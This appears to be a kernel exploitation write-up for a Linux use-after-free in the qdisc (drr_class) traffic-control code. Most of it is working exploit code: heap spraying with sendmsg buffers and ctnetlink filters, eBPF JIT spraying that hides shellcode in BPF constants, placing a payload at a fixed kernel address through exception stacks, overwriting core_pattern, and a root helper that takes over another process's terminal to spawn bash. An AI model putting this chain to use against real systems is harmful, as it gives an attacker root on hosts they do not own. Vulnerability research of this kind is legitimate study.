Using this vulnerability, we can drop the reference counter of a qdisc class to 0 and then free the class (by deleting it) while it is still attached to an active filter. When a packet is sent to the network, it is enqueued to the network scheduler. If the packet matches our filter, classification returns our freed qdisc class. The qdisc class object contains a pointer to a qdisc object, whose enqueue function pointer is used to enqueue packets to the respective network interface.
The following snippet shows the relevant code path when drr_class is the target object:
static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                       struct sk_buff **to_free)
{
    unsigned int len = qdisc_pkt_len(skb);
    struct drr_sched *q = qdisc_priv(sch);
    struct drr_class *cl;
    int err = 0;
    bool first;

    cl = drr_classify(skb, sch, &err); // [1]
    ...
    err = qdisc_enqueue(skb, cl->qdisc, to_free);
    ...
    return err;
}

static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch,
                                struct sk_buff **to_free)
{
    qdisc_calculate_pkt_len(skb, sch);
    return sch->enqueue(skb, sch, to_free); // [2]
}
At [1], drr_classify returns the freed drr_class. The freed object is then used to fetch the qdisc object via cl->qdisc, which is passed to the qdisc_enqueue function. If we can control cl->qdisc->enqueue, we get RIP control at [2].
Our target object is struct drr_class, which resides in kmalloc-128.
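To make the cache reasoning concrete, here is a minimal sketch of how an allocation size maps to a general-purpose kmalloc size class. The table lists the common x86_64 SLUB size classes and is an assumption for illustration (it is not read from a live kernel); kmalloc_bucket is a hypothetical helper name. Any replacement object must fall into the same class as the freed object to reuse its slot.

```c
#include <assert.h>
#include <stddef.h>

/* Common kmalloc size classes on x86_64 SLUB (assumed for illustration). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the smallest size class that fits `size`, or 0 if none does. */
static size_t kmalloc_bucket(size_t size)
{
    size_t n = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    for (size_t i = 0; i < n; i++)
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}
```

Under this table, any request of 97 to 128 bytes is served from kmalloc-128, so a sprayed buffer in that size range competes for the same slots.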
On targets without CONFIG_KMALLOC_SPLIT_VARSIZE, we can reallocate the freed struct drr_class with ctl_buf. We use sendmsg to spray ctl_buf with controlled data at line [3].
static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
                           unsigned int flags, struct used_address *used_address,
                           unsigned int allowed_msghdr_flags)
...
    BUILD_BUG_ON(sizeof(struct cmsghdr) !=
                 CMSG_ALIGN(sizeof(struct cmsghdr)));
    if (ctl_len > sizeof(ctl)) {
        ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
        if (ctl_buf == NULL)
            goto out;
    }
    err = -EFAULT;
    if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) // [3]
        goto out_freectl;
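On targets where CONFIG_KMALLOC_SPLIT_VARSIZE is enabled, variable-size allocations such as ctl_buf no longer share a cache with struct drr_class, so we need to find a struct that we can spray in the kmalloc-128 fixed cache. We found that struct ctnetlink_filter is in the right cache. We can spray it and place our payload in it.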
static struct ctnetlink_filter *
ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family)
{
    struct ctnetlink_filter *filter;
    int err;
    ...
    filter = kzalloc(sizeof(*filter), GFP_KERNEL);
    ...
    err = ctnetlink_filter_parse_mark(&filter->mark, cda);
    if (err)
        goto err_filter;
    err = ctnetlink_parse_filter(cda[CTA_FILTER], filter);
    if (err < 0)
This technique allows an 8-byte overwrite at offset 0x60, but requires CONFIG_NF_CONNTRACK_MARK (plus CONFIG_NETFILTER_ADVANCED and CONFIG_NETFILTER) to be enabled.
Our goal is to perform eBPF JIT spraying so that, once we control kernel RIP, execution jumps into a JIT page and runs our shellcode.
The Linux kernel provides the socket option SO_ATTACH_FILTER, which lets a user attach a classic BPF program to a socket as a filter for incoming packets.
By creating many sockets and attaching a classic BPF program to each of them, we can spray a large number of eBPF programs in the kernel.
struct sock_fprog prog = {
    .len = TSIZE,
    .filter = filter,
};
for (int i = 0; i < NUM; i++) {
    int fd[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
    // SO_ATTACH_FILTER is 26 on x86
    SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
}
As for the shellcode in our eBPF program, the goal is to overwrite /proc/sys/kernel/core_pattern so that we can later execute a command as root by triggering a crash. The shellcode performs the following steps:
- Use the rdmsr instruction to obtain a kernel text address. With RCX set to MSR_LSTAR (0xc0000082), we obtain the address of entry_SYSCALL_64.
- Calculate the addresses of core_pattern and _copy_from_user.
- Call _copy_from_user(core_pattern, user_buf, 0x30);, where user_buf is a buffer in user space that stores the content we want to write into core_pattern.
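The address calculation in the second step is plain offset arithmetic relative to the leaked entry_SYSCALL_64 address. The sketch below shows only that arithmetic in user-space C. The helper name resolve_symbol is hypothetical, and the offsets in the usage note are made-up placeholders, since the real ones depend on the specific kernel build.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Given the runtime address of a known symbol and the build-time offsets
 * (from the kernel text base) of that symbol and of a target symbol,
 * return the runtime address of the target.
 * All offsets are supplied by the caller; none are real values here.
 */
static uint64_t resolve_symbol(uint64_t leaked_addr, uint64_t leaked_off,
                               uint64_t target_off)
{
    uint64_t text_base = leaked_addr - leaked_off; /* undo KASLR slide */

    return text_base + target_off;
}
```

For example, with a placeholder leak of 0xffffffff81e00080 at placeholder offset 0xe00080, a target at placeholder offset 0x2b0000 resolves to 0xffffffff812b0000.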
We construct our eBPF program in the following form:
struct sock_filter table[] = {
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},
    {.code = BPF_LD + BPF_K, .k = 0xb3909090},
    .....................
};
The above example will be compiled into the following instructions after JIT:
b8 90 90 90 b3 mov eax, 0xb3909090
b8 90 90 90 b3 mov eax, 0xb3909090
If we redirect kernel RIP into the middle of an instruction so that it lands on one of the NOP bytes (0x90), the same bytes decode as:
90 nop
b3 b8 mov bl, 0xb8
90 nop
90 nop
90 nop
b3 b8 mov bl, 0xb8
....
We can see that the extra byte 0xb3 turns the following 0xb8 opcode byte into the operand of mov bl, so the useless byte 0xb8 is skipped and our own shellcode executes. Note that because of this skipping byte, only 3 bytes are available for shellcode in each instruction, which we have to account for when constructing the shellcode.
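The encoding described above can be sketched as a small helper that packs three payload bytes plus the 0xb3 skip byte into one 32-bit immediate. The immediate is stored little-endian, so the three payload bytes come first in memory and 0xb3 comes last, directly before the next instruction's 0xb8 opcode. The name pack_imm is hypothetical and the example uses NOP bytes only.

```c
#include <assert.h>
#include <stdint.h>

#define SKIP_BYTE 0xb3u /* "mov bl, imm8" opcode, swallows the next 0xb8 */

/*
 * Pack three payload bytes into the low 24 bits of a BPF immediate and
 * place the skip byte in the top 8 bits. In little-endian memory order
 * this yields: b0 b1 b2 b3(skip).
 */
static uint32_t pack_imm(uint8_t b0, uint8_t b1, uint8_t b2)
{
    return (uint32_t)b0 |
           ((uint32_t)b1 << 8) |
           ((uint32_t)b2 << 16) |
           (SKIP_BYTE << 24);
}
```

Calling pack_imm(0x90, 0x90, 0x90) reproduces the 0xb3909090 constant used in the table above. Any instruction longer than 3 bytes does not fit into a single slot.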
The Linux kernel maps cpu_entry_area at a fixed kernel address on x86, and that region is also used for the exception stacks. We can put our payload in registers and trigger an exception from user space. The exception handler pushes our registers onto the exception stack, which lets us control data at a fixed kernel address.
Catch the signals and skip the offending instruction:
signal(SIGFPE, handle);
signal(SIGTRAP, handle);
signal(SIGSEGV, handle);
setsid();
foo(payload);
Put our payload into the registers in a specific order:
foo:
mov rsp,rdi
pop r15
pop r14
pop r13
pop r12
pop rbp
pop rbx
pop r11
pop r10
pop r9
pop r8
pop rax
pop rcx
pop rdx
pop rsi
pop rdi
div qword [0x1234000] ; trigger div 0 exception
As a result, we can control about 0x80 bytes at a fixed kernel address.
We set cl->qdisc to the fixed kernel address that contains our controlled values, and set the enqueue function pointer to a guessed eBPF JIT address.
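As a rough illustration of where the "about 0x80 bytes" figure comes from, the buffer consumed by the pop sequence in foo can be described as a struct with one 64-bit slot per popped register, in pop order. The struct name reg_payload is hypothetical. Fifteen registers give 0x78 bytes, which is consistent with the estimate above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One 8-byte slot per register, in the order foo pops them. */
struct reg_payload {
    uint64_t r15, r14, r13, r12;
    uint64_t rbp, rbx;
    uint64_t r11, r10, r9, r8;
    uint64_t rax, rcx, rdx, rsi, rdi;
};

/* 15 registers * 8 bytes = 0x78 bytes of controlled data. */
_Static_assert(sizeof(struct reg_payload) == 15 * sizeof(uint64_t),
               "payload must be exactly 15 qwords");
```

Filling a struct like this and passing its address as the argument of foo keeps the slot-to-register mapping explicit instead of relying on raw array indices.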
Once we control kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted overwrites core_pattern with |/proc/%P/fd/666:
We then use memfd to place an executable payload at fd 666.
int check_core()
{
    // Check if /proc/sys/kernel/core_pattern has been overwritten
    char buf[0x100] = {};
    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    read(core, buf, sizeof(buf));
    close(core);
    return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}

void crash(char *cmd)
{
    int memfd = memfd_create("", 0);
    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
    dup2(memfd, 666);
    close(memfd);
    while (check_core() == 0)
        sleep(1);
    *(size_t *)0 = 0;
}
Later, when the coredump happens, the kernel executes our file as root in the root namespace:
*(size_t*)0=0; //trigger coredump
The executable file root is used to spawn a shell when the coredump happens. Its code looks like this:
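static char buf[0x100];

void *job(void *x)
{
    // Find the PID of the process whose terminal we want to reuse
    FILE *fp = popen("pidof billy", "r");
    fread(buf, 1, sizeof(buf) - 1, fp);
    pclose(fp); // streams opened with popen must be closed with pclose
    int pid = strtoull(buf, 0, 10);
    // Duplicate that process's stdin/stdout/stderr into this process
    int pfd = syscall(SYS_pidfd_open, pid, 0);
    int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
    int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
    int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
    dup2(stdinfd, 0);
    dup2(stdoutfd, 1);
    dup2(stderrfd, 2);
    execlp("bash", "bash", NULL);
    return NULL; // only reached if execlp fails
}

int main(int argc, char **argv)
{
    job(0);
}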